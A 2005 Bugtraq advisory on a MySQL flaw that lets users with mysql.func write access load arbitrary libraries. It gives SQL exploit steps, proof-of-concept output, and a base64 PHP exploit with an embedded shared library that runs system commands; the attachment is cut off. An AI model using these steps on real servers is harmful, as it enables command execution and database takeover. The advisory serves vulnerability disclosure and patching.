Subject: Mysql CREATE FUNCTION mysql.func table arbitrary library injection
From: Stefano Di Paola <stefano.dipaola@wisec.it.>
To: Bugtraq <bugtraq@securityfocus.com.>
Content-Type: multipart/mixed; boundary="=-hDpE8TGdWjVzZtJy4jG/"
Date: Fri, 11 Mar 2005 00:02:24 +0100
Message-Id: <1110495744.6557.14.camel@first.>
Mime-Version: 1.0
X-Mailer: Evolution 2.0.1-1mdk
X-Spam-Rating: smtpa1.aruba.it 1.6.2 0/1000/N
X-Virus-Scanned: antivirus-gw at tyumen.ru
--=-hDpE8TGdWjVzZtJy4jG/
Content-Type: text/plain
Content-Transfer-Encoding: 7bit
2. Mysql CREATE FUNCTION mysql.func table arbitrary library injection
Author: Stefano Di Paola
Vulnerable: Mysql <= 4.0.23, 4.1.10
Type of Vulnerability: Local/Remote Privileges Escalation - input
validation
Tested On : Mandrake 10.1 /Debian Sarge
Vendor Status: Notified on March 2005
-- Description
If an authenticated user has INSERT and DELETE privileges on 'mysql'
administrative
database, it is possible to use a library located in an arbitrary
directory.
The problem resides in the lack of checking the presence of directory
separator in udf_init() function in sql_udf.cc.
When you try to create a function loading a library from an arbitrary
directory:
mysql> create function do_system returns integer soname
'/tmp/do_system.so';
ERROR 1124: No paths allowed for shared library
do you see?
no way to load a library from an arbitrary directory...
What happens:
in sql_udf.cc
int mysql_create_function(THD *thd,udf_func *udf)
{
.....
/*
Ensure that the .dll doesn't have a path
This is done to ensure that only approved dll from the system
directories are used (to make this even remotely secure).
*/
if (strchr(udf->dl, '/'))
{
send_error(&thd->net, ER_UDF_NO_PATHS,ER(ER_UDF_NO_PATHS));
DBUG_RETURN(1);
}
is called and is checked if the name of library contains a '/'
so nobody can load a library from an arbitrary location.
Lets see where function infos are stored:
mysql> describe mysql.func;
+-------+------------------------------+------+-----+----------+-------+
| Field | Type | Null | Key | Default | Extra |
+-------+------------------------------+------+-----+----------+-------+
| name | char(64) binary | | PRI | | |
| ret | tinyint(1) | | | 0 | |
| dl | char(128) | | | | |
| type | enum('function','aggregate') | | | function | |
+-------+------------------------------+------+-----+----------+-------+
The table mysql.func holds all information about
loaded and created functions and it is kept updated for being loaded
when mysql restarts. In this way all the function previously created
can be retrieved.
This is done by calling
in sql_udf.cc
void udf_init()
{
....
Which reads mysql.func table and re-sets all previously declared
and created functions.
Well, the vulnerability lies here.
Infact it does not check if the 'dl' field contains a '/'.
If we don't use the CREATE FUNCTION statement, but we use the
INSERT INTO statement.
Putting the name of shared library in dl field.
INSERT INTO mysql.func (name,dl) VALUES
('do_system','/tmp/do_system.so');
And then we force mysql to restart, by using
for example:
CREATE FUNCTION exit RETURNS INTEGER SONAME 'libc.so.6';
SELECT exit(0);
when mysql restarts it will load the shared library from
'/tmp/do_system.so'
by allowing us to use the imported functions.
Remote exploitation is possible if db user has File_Priv (SELECT ...
INTO OUTFILE), too.
A Proof of concept for GNU/Linux is attached (needs MySql root
password):
$php exp2.php
Connected successfully as root
creating db for lib
selecting db for lib
done....
creating blob table for lib
done....
inserting blob table for lib
done....
dumping lib in /tmp/libso.so.0...
done....
sending lib....
done....
Creating exit function to restart server
done....
Selecting exit function
done!
Waiting for server to restart
Connected to MySql server again...
Sending Command...id >/tmp/id
done!
Now use your fav shell and ls -l /tmp/id
$ls -l /tmp/id
-rw-rw---- 1 mysql mysql 45 gen 28 19:25 /tmp/id
-- Solution:
Mysql released a patch.
New versions for MySQL 4.0.24 and 4.1.10a have been released. Download
them to fix the issue.
Thanks to MySQL people, they where very kind and professional.
-- Disclaimer
In no event shall the author be liable for any damages
whatsoever arising out of or in connection with the use
or spread of this information.
Any use of this information is at the user's own risk.
--
......---oOOo--------oOOo---......
Stefano Di Paola
Software Engineer
Email: stefano.dipaola_at_wisec.it
Email: stefano.dipaola1_at_tin.it
Web: www.wisec.it
..................................
--=-hDpE8TGdWjVzZtJy4jG/
Content-Disposition: attachment; filename=exp2.php
Content-Type: application/x-php; name=exp2.php
Content-Transfer-Encoding: base64
PD8KLyoqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioKKiogIE15c3FsIENSRUFU
RSBGVU5DVElPTiBmdW5jIHRhYmxlIGFyYml0cmFyeSBsaWJyYXJ5IGluamVjdGlvbgoqKgoqKiAg
QXV0aG9yOiBTdGVmYW5vIERpIFBhb2xhCioqICBWdWxuZXJhYmxlOiBNeXNxbCA8PSA0LjAuMjMs
IDQuMS4xMCAKKiogIFR5cGUgb2YgVnVsbmVyYWJpbGl0eTogTG9jYWwvUmVtb3RlIFByaXZpbGVn
ZXMgRXNjYWxhdGlvbiAgLSBpbnB1dCB2YWxpZGF0aW9uCioqICBUZXN0ZWQgT24gOiBNYW5kcmFr
ZSAxMC4xIC9EZWJpYW4gU2FyZ2UKKiogIFZlbmRvciBTdGF0dXM6IE5vdGlmaWVkIG9uIE1hcmNo
IDIwMDUKKioKKiogIENvcHlyaWdodCAyMDA1IFN0ZWZhbm8gRGkgUGFvbGEgKHN0ZWZhbm8uZGlw
YW9sYUB3aXNlYy5pdCkKKioKKiogIAoqKiBEaXNjbGFpbWVyOgoqKiAgSW4gbm8gZXZlbnQgc2hh
bGwgdGhlIGF1dGhvciBiZSBsaWFibGUgZm9yIGFueSBkYW1hZ2VzIAoqKiAgd2hhdHNvZXZlciBh
cmlzaW5nIG91dCBvZiBvciBpbiBjb25uZWN0aW9uIHdpdGggdGhlIHVzZSAKKiogIG9yIHNwcmVh
ZCBvZiB0aGlzIGluZm9ybWF0aW9uLiAKKiogIEFueSB1c2Ugb2YgdGhpcyBpbmZvcm1hdGlvbiBp
cyBhdCB0aGUgdXNlcidzIG93biByaXNrLgoqKgoqKgoqKioqKioqKioqKioqKioqKioqKioqKioq
KioqKioqKioqKioqCiovCgoKLy8gdGhpcyBpcyB0aGUgTXlTcWwgcm9vdCBwYXNzd29yZC4KJHBh
c3M9J3VzZXlvdXBhc3N3b3JkaGVyZSc7CgpmdW5jdGlvbiBteXNxbF9jcmVhdGVfZGIoJGRiLCRs
aW5rKQp7CiRxdWVyeT0iQ1JFQVRFIGRhdGFiYXNlICRkYjsiOwogcmV0dXJuICBteXNxbF9xdWVy
eSgkcXVlcnksICRsaW5rKSA7CiAgCn0KLy8gdGhlIGxpYnJhcnkgaW4gbGl0dGxlIGVuZGlhbiBo
ZXguIChmcm9tIE5HUydzIEhhY2twcm9vZmluZ19NeVNxbCBodHRwOi8vd3d3Lm5leHRnZW5zcy5j
b20vcGFwZXJzL0hhY2twcm9vZmluZ015U1FMLnBkZiApCiRzb2xpYj0iMHg3ZjQ1NGM0NjAxMDEw
MTAwMDAwMDAwMDAwMDAwMDAwMDAzMDAwMzAwMDEwMDAwMDAyMDA2MDAwMDM0MDAwMDAwMzQwYTAw
MDAwMDAwMDAwMDM0MDAyMDAwMDQwMDI4MDAxNjAwMTUwMDAxMDAwMDAwMDAwMDAwMDAwMDAwMDAw
MDAwMDAwMDAwOTQwNzAwMDA5NDA3MDAwMDA1MDAwMDAwMDAxMDAwMDAwMTAwMDAwMDk0MDcwMDAw
OTQxNzAwMDA5NDE3MDAwMDA0MDEwMDAwMDgwMTAwMDAwNjAwMDAwMDAwMTAwMDAwMDIwMDAwMDA5
YzA3MDAwMDljMTcwMDAwOWMxNzAwMDBjODAwMDAwMGM4MDAwMDAwMDYwMDAwMDAwNDAwMDAwMDUx
ZTU3NDY0MDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDA2MDAwMDAwMDQw
MDAwMDAyNTAwMDAwMDI4MDAwMDAwMDAwMDAwMDAyNjAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAw
MDAwMDAwMDAwMDAwMDAwMDAwMDAyMjAwMDAwMDI3MDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAw
MDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMjMwMDAw
MDAxZTAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAyMDAwMDAw
MDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMjEwMDAwMDAyNTAwMDAwMDAwMDAwMDAw
MDAwMDAwMDAwMDAwMDAwMDI0MDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAw
MDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAw
MDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAw
MDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAw
MDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAw
MDAwMDAwMDAwMDAwMDAwMDAwMDFjMDAwMDAwMDAwMDAwMDAxZjAwMDAwMDAwMDAwMDAwMWQwMDAw
MDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDBiNDAwMDAw
MDAwMDAwMDAwMDMwMDAxMDAwMDAwMDAwMGYwMDEwMDAwMDAwMDAwMDAwMzAwMDIwMDAwMDAwMDAw
NzAwNDAwMDAwMDAwMDAwMDAzMDAwMzAwMDAwMDAwMDAxMDA1MDAwMDAwMDAwMDAwMDMwMDA0MDAw
MDAwMDAwMDYwMDUwMDAwMDAwMDAwMDAwMzAwMDUwMDAwMDAwMDAwOTAwNTAwMDAwMDAwMDAwMDAz
MDAwNjAwMDAwMDAwMDBjMDA1MDAwMDAwMDAwMDAwMDMwMDA3MDAwMDAwMDAwMGQwMDUwMDAwMDAw
MDAwMDAwMzAwMDgwMDAwMDAwMDAwZTgwNTAwMDAwMDAwMDAwMDAzMDAwOTAwMDAwMDAwMDAyMDA2
MDAwMDAwMDAwMDAwMDMwMDBhMDAwMDAwMDAwMDc0MDcwMDAwMDAwMDAwMDAwMzAwMGIwMDAwMDAw
MDAwOTAwNzAwMDAwMDAwMDAwMDAzMDAwYzAwMDAwMDAwMDA5NDE3MDAwMDAwMDAwMDAwMDMwMDBk
MDAwMDAwMDAwMDljMTcwMDAwMDAwMDAwMDAwMzAwMGUwMDAwMDAwMDAwNjQxODAwMDAwMDAwMDAw
MDAzMDAwZjAwMDAwMDAwMDA2YzE4MDAwMDAwMDAwMDAwMDMwMDEwMDAwMDAwMDAwMDc0MTgwMDAw
MDAwMDAwMDAwMzAwMTEwMDAwMDAwMDAwNzgxODAwMDAwMDAwMDAwMDAzMDAxMjAwMDAwMDAwMDA5
ODE4MDAwMDAwMDAwMDAwMDMwMDEzMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMzAwMTQwMDAw
MDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAzMDAxNTAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDMw
MDE2MDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMzAwMTcwMDAwMDAwMDAwMDAwMDAwMDAwMDAw
MDAwMDAzMDAxODAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDMwMDE5MDAwMDAwMDAwMDAwMDAw
MDAwMDAwMDAwMDAwMzAwMWEwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAzMDAxYjAwMDEwMDAw
MDA5YzE3MDAwMDAwMDAwMDAwMTEwMGYxZmY2MTAwMDAwMDAwMDAwMDAwNzYwMDAwMDAxMjAwMDAw
MDJmMDAwMDAwZDAwNTAwMDAwMDAwMDAwMDEyMDAwODAwNzkwMDAwMDA5ODE4MDAwMDAwMDAwMDAw
MTAwMGYxZmYzNTAwMDAwMDc0MDcwMDAwMDAwMDAwMDAxMjAwMGIwMDNiMDAwMDAwMDAwMDAwMDA5
NzAwMDAwMDIyMDAwMDAwNWUwMDAwMDAwODA3MDAwMDM2MDAwMDAwMTIwMDBhMDA3MjAwMDAwMDk4
MTgwMDAwMDAwMDAwMDAxMDAwZjFmZjBhMDAwMDAwNzgxODAwMDAwMDAwMDAwMDExMDBmMWZmODUw
MDAwMDA5YzE4MDAwMDAwMDAwMDAwMTAwMGYxZmY0YTAwMDAwMDAwMDAwMDAwMDAwMDAwMDAyMDAw
MDAwMDIwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDIwMDAwMDAwMDA1ZjQ0NTk0ZTQxNGQ0OTQzMDA1
ZjQ3NGM0ZjQyNDE0YzVmNGY0NjQ2NTM0NTU0NWY1NDQxNDI0YzQ1NWYwMDVmNWY2NzZkNmY2ZTVm
NzM3NDYxNzI3NDVmNWYwMDVmNjk2ZTY5NzQwMDVmNjY2OTZlNjkwMDVmNWY2Mzc4NjE1ZjY2Njk2
ZTYxNmM2OTdhNjUwMDVmNGE3NjVmNTI2NTY3Njk3Mzc0NjU3MjQzNmM2MTczNzM2NTczMDA2NDZm
NWY3Mzc5NzM3NDY1NmQwMDZjNjk2MjYzMmU3MzZmMmUzNjAwNWY2NTY0NjE3NDYxMDA1ZjVmNjI3
MzczNWY3Mzc0NjE3Mjc0MDA1ZjY1NmU2NDAwNDc0YzQ5NDI0MzVmMzIyZTMxMmUzMzAwNDc0YzQ5
NDI0MzVmMzIyZTMwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAw
MDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAw
MDAwMDAwMDAwMDAwMDEwMDAyMDAwMTAwMDEwMDAxMDAwMzAwMDEwMDAxMDAwMTAwMDEwMDAwMDAw
MDAwMDEwMDAyMDA2ODAwMDAwMDEwMDAwMDAwMDAwMDAwMDA3MzFmNjkwOTAwMDAwMzAwOGEwMDAw
MDAxMDAwMDAwMDEwNjk2OTBkMDAwMDAyMDA5NjAwMDAwMDAwMDAwMDAwOTQxNzAwMDAwODAwMDAw
MDk4MTcwMDAwMDgwMDAwMDAyYjA3MDAwMDAyMWQwMDAwOGMxODAwMDAwNjIxMDAwMDkwMTgwMDAw
MDYyNjAwMDA5NDE4MDAwMDA2MjcwMDAwODQxODAwMDAwNzIxMDAwMDg4MTgwMDAwMDcyNjAwMDA1
NTg5ZTU4M2VjMDhlODQ1MDAwMDAwZThlMDAwMDAwMGU4NWIwMTAwMDBjOWMzMDBmZmIzMDQwMDAw
MDBmZmEzMDgwMDAwMDAwMDAwMDAwMGZmYTMwYzAwMDAwMDY4MDAwMDAwMDBlOWUwZmZmZmZmZmZh
MzEwMDAwMDAwNjgwODAwMDAwMGU5ZDBmZmZmZmYwMDAwMDAwMDAwMDAwMDAwNTU4OWU1NTNlODAw
MDAwMDAwNWI4MWMzNGYxMjAwMDA1MjhiODMxYzAwMDAwMDg1YzA3NDAyZmZkMDU4NWJjOWMzOTA5
MDkwOTA5MDkwOTA5MDkwOTA5MDkwOTA5MDkwNTU4OWU1NTNlODAwMDAwMDAwNWI4MWMzMWYxMjAw
MDA1MTgwYmIyMDAwMDAwMDAwNzUzNDhiOTMxNDAwMDAwMDg1ZDI3NTJmOGI4MzIwZmZmZmZmOGIx
MDg1ZDI3NDE3ODNjMDA0ODk4MzIwZmZmZmZmZmZkMjhiODMyMGZmZmZmZjhiMTA4NWQyNzVlOWM2
ODMyMDAwMDAwMDAxOGI1ZGZjYzljMzgzZWMwYzhiODMxY2ZmZmZmZjUwZTg0NmZmZmZmZjgzYzQx
MGViYmQ4OWY2OGRiYzI3MDAwMDAwMDA1NTg5ZTU1M2U4MDAwMDAwMDA1YjgxYzNhZjExMDAwMDUw
OGI4M2ZjZmZmZmZmODVjMDc0MGE4YjgzMTgwMDAwMDA4NWMwNzUwYjhiNWRmY2M5YzM4ZGI2MDAw
MDAwMDA4M2VjMGM4ZDgzZmNmZmZmZmY1MGU4MDlmZmZmZmY4M2M0MTA4YjVkZmNjOWMzOTA1NTg5
ZTU4M2VjMDg4YjQ1MGM4MzM4MDE3NDA5Yzc0NWZjMDAwMDAwMDBlYjFhODNlYzBjOGI0NTBjOGI0
MDA4ZmYzMGU4ZmNmZmZmZmY4M2M0MTBjNzQ1ZmMwMDAwMDAwMDhiNDVmY2M5YzM5MDkwNTU4OWU1
NTY1M2U4MDAwMDAwMDA1YjgxYzMyZTExMDAwMDhkODNmMGZmZmZmZjhkNzBmYzhiNDBmYzgzZjhm
Zjc0MGM4M2VlMDRmZmQwOGIwNjgzZjhmZjc1ZjQ1YjVlNWRjMzkwOTA1NTg5ZTU1M2U4MDAwMDAw
MDA1YjgxYzNmYjEwMDAwMDUwZThjNmZlZmZmZjU5NWJjOWMzMDAwMDAwMDAwMDAwOTQxNzAwMDA3
MDE4MDAwMDAxMDAwMDAwNjgwMDAwMDAwYzAwMDAwMGQwMDUwMDAwMGQwMDAwMDA3NDA3MDAwMDA0
MDAwMDAwYjQwMDAwMDAwNTAwMDAwMDcwMDQwMDAwMDYwMDAwMDBmMDAxMDAwMDBhMDAwMDAwYTAw
MDAwMDAwYjAwMDAwMDEwMDAwMDAwMDMwMDAwMDA3ODE4MDAwMDAyMDAwMDAwMTAwMDAwMDAxNDAw
MDAwMDExMDAwMDAwMTcwMDAwMDBjMDA1MDAwMDExMDAwMDAwOTAwNTAwMDAxMjAwMDAwMDMwMDAw
MDAwMTMwMDAwMDAwODAwMDAwMDE2MDAwMDAwMDAwMDAwMDBmZWZmZmY2ZjYwMDUwMDAwZmZmZmZm
NmYwMTAwMDAwMGYwZmZmZjZmMTAwNTAwMDBmYWZmZmY2ZjAyMDAwMDAwMDAwMDAwMDAwMDAwMDAw
MDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAw
MDAwMDAwMDBmZmZmZmZmZjAwMDAwMDAwZmZmZmZmZmYwMDAwMDAwMDAwMDAwMDAwOWMxNzAwMDAw
MDAwMDAwMDAwMDAwMDAwZmUwNTAwMDAwZTA2MDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAw
NDc0MzQzM2EyMDI4NDc0ZTU1MjkyMDMzMmUzMzJlMzEyMDI4NGQ2MTZlNjQ3MjYxNmI2NTIwNGM2
OTZlNzU3ODIwMzkyZTMyMjAzMzJlMzMyZTMxMmQzMTZkNjQ2YjI5MDAwMDQ3NDM0MzNhMjAyODQ3
NGU1NTI5MjAzMzJlMzMyZTMxMjAyODRkNjE2ZTY0NzI2MTZiNjUyMDRjNjk2ZTc1NzgyMDM5MmUz
MjIwMzMyZTMzMmUzMTJkMzI2ZDY0NmIyOTAwMDA0NzQzNDMzYTIwMjg0NzRlNTUyOTIwMzMyZTMz
MmUzMTIwMjg0ZDYxNmU2NDcyNjE2YjY1MjA0YzY5NmU3NTc4MjAzOTJlMzIyMDMzMmUzMzJlMzEy
ZDMyNmQ2NDZiMjkwMDAwNDc0MzQzM2EyMDI4NDc0ZTU1MjkyMDMzMmUzMzJlMzEyMDI4NGQ2MTZl
NjQ3MjYxNmI2NTIwNGM2OTZlNzU3ODIwMzkyZTMyMjAzMzJlMzMyZTMxMmQzMjZkNjQ2YjI5MDAw
MDQ3NDM0MzNhMjAyODQ3NGU1NTI5MjAzMzJlMzMyZTMxMjAyODRkNjE2ZTY0NzI2MTZiNjUyMDRj
Njk2ZTc1NzgyMDM5MmUzMjIwMzMyZTMzMmUzMTJkMzE2ZDY0NmIyOTAwMDAyZTczNjg3Mzc0NzI3
NDYxNjIwMDJlNjg2MTczNjgwMDJlNjQ3OTZlNzM3OTZkMDAyZTY0Nzk2ZTczNzQ3MjAwMmU2NzZl
NzUyZTc2NjU3MjczNjk2ZjZlMDAyZTY3NmU3NTJlNzY2NTcyNzM2OTZmNmU1ZjcyMDAyZTcyNjU2
YzJlNjQ3OTZlMDAyZTcyNjU2YzJlNzA2Yzc0MDAyZTY5NmU2OTc0MDAyZTc0NjU3ODc0MDAyZTY2
Njk2ZTY5MDAyZTY1Njg1ZjY2NzI2MTZkNjUwMDJlNjQ2MTc0NjEwMDJlNjQ3OTZlNjE2ZDY5NjMw
MDJlNjM3NDZmNzI3MzAwMmU2NDc0NmY3MjczMDAyZTZhNjM3MjAwMmU2NzZmNzQwMDJlNjI3Mzcz
MDAyZTYzNmY2ZDZkNjU2ZTc0MDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAw
MDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwYjAwMDAwMDA1
MDAwMDAwMDIwMDAwMDBiNDAwMDAwMGI0MDAwMDAwM2MwMTAwMDAwMjAwMDAwMDAwMDAwMDAwMDQw
MDAwMDAwNDAwMDAwMDExMDAwMDAwMGIwMDAwMDAwMjAwMDAwMGYwMDEwMDAwZjAwMTAwMDA4MDAy
MDAwMDAzMDAwMDAwMWMwMDAwMDAwNDAwMDAwMDEwMDAwMDAwMTkwMDAwMDAwMzAwMDAwMDAyMDAw
MDAwNzAwNDAwMDA3MDA0MDAwMGEwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAxMDAwMDAwMDAwMDAw
MDAyMTAwMDAwMGZmZmZmZjZmMDIwMDAwMDAxMDA1MDAwMDEwMDUwMDAwNTAwMDAwMDAwMjAwMDAw
MDAwMDAwMDAwMDIwMDAwMDAwMjAwMDAwMDJlMDAwMDAwZmVmZmZmNmYwMjAwMDAwMDYwMDUwMDAw
NjAwNTAwMDAzMDAwMDAwMDAzMDAwMDAwMDEwMDAwMDAwNDAwMDAwMDAwMDAwMDAwM2QwMDAwMDAw
OTAwMDAwMDAyMDAwMDAwOTAwNTAwMDA5MDA1MDAwMDMwMDAwMDAwMDIwMDAwMDAwMDAwMDAwMDA0
MDAwMDAwMDgwMDAwMDA0NjAwMDAwMDA5MDAwMDAwMDIwMDAwMDBjMDA1MDAwMGMwMDUwMDAwMTAw
MDAwMDAwMjAwMDAwMDA5MDAwMDAwMDQwMDAwMDAwODAwMDAwMDRmMDAwMDAwMDEwMDAwMDAwNjAw
MDAwMGQwMDUwMDAwZDAwNTAwMDAxNzAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwNDAwMDAwMDAwMDAw
MDAwNGEwMDAwMDAwMTAwMDAwMDA2MDAwMDAwZTgwNTAwMDBlODA1MDAwMDMwMDAwMDAwMDAwMDAw
MDAwMDAwMDAwMDA0MDAwMDAwMDQwMDAwMDA1NTAwMDAwMDAxMDAwMDAwMDYwMDAwMDAyMDA2MDAw
MDIwMDYwMDAwNTQwMTAwMDAwMDAwMDAwMDAwMDAwMDAwMTAwMDAwMDAwMDAwMDAwMDViMDAwMDAw
MDEwMDAwMDAwNjAwMDAwMDc0MDcwMDAwNzQwNzAwMDAxYTAwMDAwMDAwMDAwMDAwMDAwMDAwMDAw
NDAwMDAwMDAwMDAwMDAwNjEwMDAwMDAwMTAwMDAwMDAyMDAwMDAwOTAwNzAwMDA5MDA3MDAwMDA0
MDAwMDAwMDAwMDAwMDAwMDAwMDAwMDA0MDAwMDAwMDAwMDAwMDA2YjAwMDAwMDAxMDAwMDAwMDMw
MDAwMDA5NDE3MDAwMDk0MDcwMDAwMDgwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDQwMDAwMDAwMDAw
MDAwMDcxMDAwMDAwMDYwMDAwMDAwMzAwMDAwMDljMTcwMDAwOWMwNzAwMDBjODAwMDAwMDAzMDAw
MDAwMDAwMDAwMDAwNDAwMDAwMDA4MDAwMDAwN2EwMDAwMDAwMTAwMDAwMDAzMDAwMDAwNjQxODAw
MDA2NDA4MDAwMDA4MDAwMDAwMDAwMDAwMDAwMDAwMDAwMDA0MDAwMDAwMDAwMDAwMDA4MTAwMDAw
MDAxMDAwMDAwMDMwMDAwMDA2YzE4MDAwMDZjMDgwMDAwMDgwMDAwMDAwMDAwMDAwMDAwMDAwMDAw
MDQwMDAwMDAwMDAwMDAwMDg4MDAwMDAwMDEwMDAwMDAwMzAwMDAwMDc0MTgwMDAwNzQwODAwMDAw
NDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwNDAwMDAwMDAwMDAwMDAwOGQwMDAwMDAwMTAwMDAwMDAz
MDAwMDAwNzgxODAwMDA3ODA4MDAwMDIwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDA0MDAwMDAwMDQw
MDAwMDA5MjAwMDAwMDA4MDAwMDAwMDMwMDAwMDA5ODE4MDAwMDk4MDgwMDAwMDQwMDAwMDAwMDAw
MDAwMDAwMDAwMDAwMDQwMDAwMDAwMDAwMDAwMDk3MDAwMDAwMDEwMDAwMDAwMDAwMDAwMDAwMDAw
MDAwOTgwODAwMDBmYTAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMTAwMDAwMDAwMDAwMDAwMDEwMDAw
MDAwMzAwMDAwMDAwMDAwMDAwMDAwMDAwMDA5MjA5MDAwMGEwMDAwMDAwMDAwMDAwMDAwMDAwMDAw
MDAxMDAwMDAwMDAwMDAwMDAiOwoKCiRsaW5rPW15c3FsX2Nvbm5lY3QoIjEyNy4wLjAuMSIsInJv
b3QiLCRwYXNzKTsKaWYgKCEkbGluaykgewogICBkaWUoJ0NvdWxkIG5vdCBjb25uZWN0OiAnIC4g
bXlzcWxfZXJyb3IoKSk7Cn0KZWNobyAiQ29ubmVjdGVkIHN1Y2Nlc3NmdWxseSBhcyByb290XG4i
OwplY2hvICJjcmVhdGluZyBkYiBmb3IgbGliXG4iOwpteXNxbF9jcmVhdGVfZGIoJ215X2RiJywk
bGluaykgIG9yIHByaW50ICgnY2Fubm90IGNyZWF0ZSBteV9kYiBkYiwgc29ycnkhJyk7CmVjaG8g
ImRvbmUuLi4uXG4iOwplY2hvICJzZWxlY3RpbmcgZGIgZm9yIGxpYlxuIjsKbXlzcWxfc2VsZWN0
X2RiKCdteV9kYicpIG9yIHByaW50ICgnY2Fubm90IHVzZSBteV9kYiBkYiwgc29ycnkhJyk7CmVj
aG8gImRvbmUuLi4uXG4iOwoKZWNobyAiY3JlYXRpbmcgYmxvYiB0YWJsZSBmb3IgbGliXG4iOwok
cXVlcnk9IkNSRUFURSBUQUJMRSBibG9iX3RhYiAoYmxvYl9jb2wgQkxPQik7IjsKJHJlc3VsdCA9
IG15c3FsX3F1ZXJ5KCRxdWVyeSwgJGxpbmspIG9yIHByaW50KCJjYW5ub3QgIGNyZWF0ZSBibG9i
IHRhYmxlIGZvciBsaWJcbiIpOwplY2hvICJkb25lLi4uLlxuIjsKCmVjaG8gImluc2VydGluZyBi
bG9iIHRhYmxlIGZvciBsaWJcbiI7CiRxdWVyeT0iSU5TRVJUIGludG8gYmxvYl90YWIgdmFsdWVz
IChDT05WRVJUKCRzb2xpYixDSEFSKSk7IjsKJHJlc3VsdCA9IG15c3FsX3F1ZXJ5KCRxdWVyeSwg
JGxpbmspIG9yIHByaW50KCJjYW5ub3QgIGluc2VydCBibG9iIGZvciBsaWJcbiIpOwplY2hvICJk
b25lLi4uLlxuIjsKCmVjaG8gImR1bXBpbmcgbGliIGluIC90bXAvbGlic28uc28uMC4uLlxuIjsK
JHF1ZXJ5PSJTRUxFQ1QgYmxvYl9jb2wgRlJPTSBibG9iX3RhYiBJTlRPIERVTVBGSUxFICcvdG1w
L2xpYnNvLnNvLjAnOyI7CiRyZXN1bHQgPSBteXNxbF9xdWVyeSgkcXVlcnksICRsaW5rKSBvciBw
cmludCgiY2Fubm90ICBkdW1wIGxpYlxuIik7CmVjaG8gIiBkb25lLi4uLlxuIjsKCm15c3FsX3Nl
bGVjdF9kYignbXlzcWwnKSBvciBkaWUgKCdjYW5ub3QgdXNlIG15c3FsIGRiLCBzb3JyeSEnKTsK
ZWNobyAic2VuZGluZyBsaWIuLi4uXG4iOwoKJHF1ZXJ5PSJpbnNlcnQgaW50byBmdW5jIChuYW1l
LGRsKSB2YWx1ZXMgKCdkb19zeXN0ZW0nLCcvdG1wL2xpYnNvLnNvLjAnKTsiOwokcmVzdWx0ID0g
bXlzcWxfcXVlcnkoJHF1ZXJ5LCAkbGluayk7CmVjaG8gImRvbmUuLi4uXG4iOwplY2hvICJDcmVh
dGluZyBleGl0IGZ1bmN0aW9uIHRvIHJlc3RhcnQgc2VydmVyXG4iOwoKJHF1ZXJ5PSJjcmVhdGUg
ZnVuY3Rpb24gZXhpdCByZXR1cm5zIGludGVnZXIgc29uYW1lICdsaWJjLnNvLjYnOyI7CiRyZXN1
bHQgPSBteXNxbF9xdWVyeSgkcXVlcnksICRsaW5rKSBvciBwcmludCAoImNhbm5vdCBjcmVhdGUg
ZXhpdCwgc29ycnkhXG4iKTsKZWNobyAiZG9uZS4uLi5cbiI7CmVjaG8gIlNlbGVjdGluZyBleGl0
IGZ1bmN0aW9uXG4iOwoKJHF1ZXJ5PSJzZWxlY3QgZXhpdCgpOyI7CiRyZXN1bHQgPSBteXNxbF9x
dWVyeSgkcXVlcnksICRsaW5rKTsKZWNobyAiZG9uZSFcbldhaXRpbmcgZm9yIHNlcnZlciB0byBy
ZXN0YXJ0XG4iOwoKc2xlZXAoMSk7CgokbGluaz1teXNxbF9jb25uZWN0KCIxMjcuMC4wLjEiLCJy
b290IiwkcGFzcyk7CmlmICghJGxpbmspIHsKICAgZGllKCdDb3VsZCBub3QgY29ubmVjdDogJyAu
